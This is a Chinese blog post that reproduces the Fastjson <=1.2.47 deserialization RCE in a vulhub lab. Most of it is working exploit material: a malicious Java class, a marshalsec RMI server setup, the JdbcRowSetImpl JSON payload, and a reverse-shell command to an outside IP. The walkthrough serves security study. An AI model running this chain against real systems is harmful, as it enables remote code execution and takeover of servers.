rmi反序列化导致rce漏洞修复_企业安全05-Fastjson <=1.2.47反序列化RCE漏洞(CNVD-2019-22238)...

最新推荐文章于 2024-02-20 19:54:22 发布
最新推荐文章于 2024-02-20 19:54:22 发布
阅读量115 收藏
点赞数
文章标签: rmi反序列化导致rce漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39863616/article/details/111890881
版权

Fastjson <=1.2.47反序列化RCE漏洞(CNVD-2019-22238)

一、漏洞描述

Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

二、影响版本

Fastjson1.2.47以及之前的所有版本

三、环境搭建

vulhub靶场,进入fastjson漏洞环境目录下,执行

cd 1.2.47-rce/

docker-compose up -d

四、漏洞检测

手动检测:

{"a":{"@type":"java.net.Inet4Address","val":"dnslog"}}

{"a":{"@type":"java.net.Inet6Address","val":"dnslog"}}

{"a":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}

{"a":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}}

{"a":{"@type":"java.net.URL","val":"dnslog"}}

五、漏洞复现

1、编译上传TouchFile.class

这里的TouchFile是要编译好的恶意类,将编译好的TouchFile.class放在tomcat webapps/ROOT 目录下,java源码如下

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

2、编译需要使用java环境,安装步骤如下

sudo apt-get update #更新软件包列表:

sudo apt install default-jre #安装默认jre

java -version #查看java版本

javac TouchFile.java #编译为TouchFile.class

3、安装docker 拉起tomcat

curl -s https://get.docker.com/ | sh

curl -s https://bootstrap.pypa.io/get-pip.py | python

pip install docker-compose

docker search tomcat #搜索镜像(默认去Docker Hub查找)

docker pull tomcat:8.0.52 #指定版本拉取tomcat

docker images #拉取成功查看拉取的镜像

docker run --name ytomcat -d -p 8081:8080 tomcat:8.0.52 #根据镜像启动一个容器

4、宿主机向Docker容器传送文件

docker cp 本地文件的路径 container_id:

docker cp /root/TouchFile.class 5eff9f38e0c7:/usr/local/tomcat/webapps/ROOT #例子

mkdir TouchFile #创建TouchFile目录

mv TouchFile.class TouchFile #将TouchFile.class剪切到TouchFile目录里

将exp.class上传至你的web服务器,地址为http://yours_ip/exp/TouchFile.class。

我的地址为:http://8.210.235.249/TouchFile/TouchFile.class

5、借助marshalsec项目,快速开启rmi或ldap服务

apt install git #安装git

git clone https://github.com/mbechler/marshalsec #下载marshalsec

apt install maven #下载maven,使用maven进行编译jar包

cd marshalsec

mvn clean package -DskipTests

启动一个RMI服务器,监听9988端口,并制定加载远程类TouchFile.class:

cd target

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://8.210.235.249/#TouchFile" 9988

6、发送Payload

POST / HTTP/1.1

Host: your-ip:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 160

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://8.210.235.249/exp",

"autoCommit":true

}

}

至此漏洞复现成功

六、反弹shell

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/8.210.235.249/6666 0>&1"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

和前边同理:

编译-->将TouchFile.class上传至web服务器-->启动RMI服务器监听端口-->nc 监听端口-->burpsuite发送Payload

weixin_39863616
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jmeter RMI 序列命令执行漏洞复现
Tauil的博客
08-02 814
针对目标主机地址及端口的RMI Registry建立远程连接(RMI—使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol)进行通信),连接成功后提交执行用户选择的 payload。可以看到,环境开启后将启动RMI服务并监听1099端口,我们只需要使用ysoserial.exploit.RMIRegistryExploit即可执行任意命令。靶场:vulhub—jmeter/CVE-2018-1297/根据输入命令转为对应序列内容,然后将消息发送。...
Jboss Application Server序列命令执行漏洞利用工具(CVE-2017-12149)
07-23
漏洞主要影响JBoss AS 7.x和EAP 6.x版本,这些版本中包含了`org.jboss.remoting3.protocol.ser`包,该包处理序列时存在缺陷。攻击者可以通过发送特制的序列对象到服务器的RMI注册表,触发恶意代码执行。RMI...
fastjson jar包_Fastjson<=1.2.47序列RCE漏洞(CNVD201922238)
weixin_39677104的博客
11-28 167
Fastjson <=1.2.47序列RCE漏洞(CNVD‐2019‐22238)一、漏洞描述Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列 为 JSON 字符串,也可以从 JSON 字符串序列到 JavaBean。Fastjson提供了autotype功能,允许用户在序列数据中通过“@typ...
java序列漏洞利用工具_Apache Dubbo Provider默认序列远程代码执行漏洞
weixin_39597636的博客
11-30 349
背景近日,Apache Dubbo披露了Provider默认序列远程代码执行漏洞(CVE-2020-1948),攻击者可构造恶意请求,从而执行任意代码。具体信息如上图所示。在官方邮件中,漏洞报告者还提供了官方的PoC脚本,感兴趣的读者可以自行抓包和学习。本文旨在复现漏洞,找出漏洞利用条件,提出漏洞修复方案。dubbo基础知识简 介是一款高性能、轻量级的开源Jav...
rmi序列导致rce漏洞修复_Spring框架的序列远程代码执行漏洞分析
weixin_33978722的博客
12-23 247
Spring框架的序列远程代码执行漏洞分析星期三, 一月 27, 20160漏洞介绍国外的研究人员zero thoughts发现了一个Spring框架的序列远程代码执行漏洞。spring-tx.jar包中的org.springframework.transaction.jta.JtaTransactionManager类存在JNDI序列问题。只要创建一个JtaTransactionMa...
fastjson 1.2.24 序列 RCE 漏洞复现(CVE-2017-18349)
一个top2本科学渣的救赎之路
04-23 6334
fastjson 1.2.24 序列导致任意命令执行漏洞,可获得服务器root权限
java序列漏洞-验证.rar
06-25
然而,这个过程也可能带来安全隐患,当不安全的类被序列时,可能会导致代码执行、权限提升或其他恶意操作。 标题“java序列漏洞-验证.rar”暗示了这是一个关于如何验证Java序列漏洞的资源包。通常,...
fastjson_rce_tool:fastjson命令执行自动利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
Java序列序列原理及漏洞解决方案
08-18
Java序列序列原理及漏洞解决方案 Java序列序列原理及漏洞解决方案是Java编程语言中的一项重要机制,该机制允许将Java对象转换为字节序列,以便在网络上传输或存储在文件中。同时,Java也提供了序列...
WebLogic序列_CVE-2017-3248
09-06
WebLogic序列_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C <arg> (执行命令)Execute ...
javaRMI序列漏洞验证工具
08-21
检测javaRMI序列漏洞
rmi远程序列rce漏洞_fastjson 序列远程代码执行漏洞复现
weixin_39599454的博客
12-23 115
漏洞概述:fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列为 JSON 字符串,也可以从 JSON 字符串序列到 JavaBean。首先,Fastjson提供了autotype功能,允许用户在序列数据中通过“@type”指定序列的类型,其次,Fastjson自定义的序列机制时会调用指定类中的setter方法及部...
rmi远程序列rce漏洞_Weblogic wls9-async序列远程代码执行漏洞(CVE-2019-2725)漏洞分析...
weixin_30390951的博客
02-22 282
阅读:1,361这个漏洞最先由某厂商报给某银行,某银行再将该信息报给CNVD,后CNVD通告:国家信息安全漏洞共享平台(CNVD)收录了由该银行报送的Oracle WebLogic wls9-async序列远程命令执行漏洞(CNVD-C-2019-48814),详情见链接:cnvd对于该漏洞,Oracle官方也破例了一回,提前发了补丁,但是这个补丁只是针对10.3.6系列的,对于12版本系列...
Fastjson序列漏洞——fastjson RCE漏洞的源头(1.2.24-rce)
最新发布
m0_71263989的博客
02-20 1006
FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。近几年来fastjson漏洞层出不穷,本文将谈谈近几年来fastjson RCE漏洞的源头:17年fastjson爆出的1.2.24序列漏洞。以这个漏洞为基础,详细分析fastjson漏洞的一些细节问题。
rmi 序列漏洞_Dubbo序列漏洞复现分析(二)
weixin_30480281的博客
12-30 145
成功弹出计算机5.漏洞分析我们从idea里的报错栈可以看到入口应该是javax.servlet.http.HttpServlet.service我们在this.service处下个断点我们用postman发个包,然后跟进去,发现它会用handler函数处理request,response随后发现其进入org.apache.dubbo.rpc.protocol.heep.HttpProto...
rmi序列导致rce漏洞修复_JAVA序列漏洞解决办法
weixin_39527911的博客
12-23 482
一、漏洞描述:近期,序列任意代码执行漏洞持续发酵,越来越多的系统被爆出存在此漏洞。Apache Commons工具集广泛应用于JAVA技术平台,存在Apache Commons Components InvokerTransformer序列任意代码执行漏洞, WebLogic、IBM WebSphere、JBoss、Jenkins和OpenNMS等应用都大量调用了Commons工具集,通过...
自检代码中trustmanager漏洞_Fasterxml Jacksondatabind漏洞分析与利用
weixin_39640767的博客
11-22 823
一、 Fasterxml Jackson-databind组件介绍FasterXML Jackson是美国FasterXML公司的一款适用于Java的数据处理工具。Jackson-databind是其中的一个具有数据绑定功能的组件。Jackson-databind可以将Java对象转换成json对象,同样也可以将json转换成Java对象。二、各版本介绍Fasterxml的jackson...
java序列漏洞对策
邢立军的技术专栏
06-01 791
1)java序列漏洞请百度。 2)对策: ObjectInputStream.readObject()的地方改为 附件中的 SerialKiller.readObject()。 附件有2个文件: SerialKiller.conf为配置文件,可以指定白名单,仅仅对白名单中的类序列 SerialKiller.java为ObjectInputStream的子类,覆盖了resol...
rmi 序列漏洞_RMI序列漏洞分析
weixin_33800074的博客
01-05 616
原创:Xman21合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ一、RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远...
rmi远程序列rce漏洞_Spring框架的序列远程代码执行漏洞分析(转)
06-06
总的来说,RMI远程序列RCE漏洞和Spring框架的序列远程代码执行漏洞都是Java序列机制的设计缺陷所导致安全漏洞。攻击者可以通过构造恶意的序列数据来绕过Java的安全机制,从而执行任意代码。因此,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值